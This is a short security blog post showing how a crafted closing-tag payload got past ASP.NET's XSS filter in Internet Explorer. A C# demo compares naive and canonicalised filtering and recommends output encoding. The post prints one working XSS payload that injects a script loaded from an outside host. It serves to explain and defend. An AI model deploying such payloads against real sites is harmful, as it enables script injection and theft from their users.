---
layout: post
status: publish
published: true
title: Bypass ASP.NET XSS Protection in Internet Explorer

wordpress_id: 290
wordpress_url: http://pro.grammatic.org/post-bypass-aspnet-xss-protection-in-internet-explorer-8.aspx
date: !binary |-
  MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA==
date_gmt: !binary |-
  MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA==
categories:
- Technology
- InfoSec
- .NET
tags:
- information security
- .NET
comments: []
---
<p>ASP.NET ships with default XSS protection that is actually pretty nifty. However, it turns out that the filter can be circumvented by a variety of methods, as this test input illustrates:</p>

{% highlight html %}
	</a style="xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://www.site.com/JS.js')">
{% endhighlight %}

<p>It turns out that IE still processes attributes on closing tags, which circumvents the filter's check for &lt;a. IE also treats /**/ as a null comment, so the split keyword is still read as <code>expression</code> while the string no longer matches .NET's filter regex. Thanks to Hong @ <a href="http://sla.ckers.org/forum/read.php?2,7462,8409%23msg-8409">sla.ckers</a>.</p>
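
<p>The mismatch described above, as an added example that is not part of the original post and not ASP.NET's own code: the <code>Naive</code> pattern is a constructed stand-in for a pattern-based filter (an assumption, not the framework's actual rules), checked against the test input before and after canonicalisation, followed by output encoding with <code>WebUtility.HtmlEncode</code>.</p>

```csharp
using System;
using System.Net;
using System.Text.RegularExpressions;

static class FilterDemo
{
    // Constructed stand-in for a pattern-based input filter (NOT ASP.NET's real rules):
    // rejects "<" followed by a letter, and the literal token "expression(".
    static readonly Regex Naive =
        new Regex(@"<[a-z]|expression\s*\(", RegexOptions.IgnoreCase);

    // CSS comments, which the post says IE treats as null inside the style value.
    static readonly Regex CssComment =
        new Regex(@"/\*.*?\*/", RegexOptions.Singleline);

    // The filter applied to the raw request value, as a blacklist normally is.
    static bool NaiveRejects(string input) => Naive.IsMatch(input);

    // Canonicalise first: drop CSS comments and treat closing tags like opening
    // tags, so the filter sees roughly what the browser will interpret.
    static bool NormalisedRejects(string input)
    {
        string canon = CssComment.Replace(input, "");
        canon = Regex.Replace(canon, @"<\s*/\s*", "<");
        return Naive.IsMatch(canon);
    }

    static void Main()
    {
        // The test input from the post, held as inert string data.
        string input = "</a style=\"xx:expr/**/ession(document.appendChild("
                     + "document.createElement('script')).src="
                     + "'http://www.site.com/JS.js')\">";

        Console.WriteLine("naive filter rejects:      " + NaiveRejects(input));
        Console.WriteLine("normalised filter rejects: " + NormalisedRejects(input));

        // Encoding at the point of output does not depend on recognising the
        // payload: the markup characters are emitted as entities, not as a tag.
        Console.WriteLine(WebUtility.HtmlEncode(input));
    }
}
```

<p>Canonicalising before matching closes this particular gap, but it still relies on the filter parsing input the same way the browser does. Encoding untrusted values when they are written into the page does not have that dependency.</p>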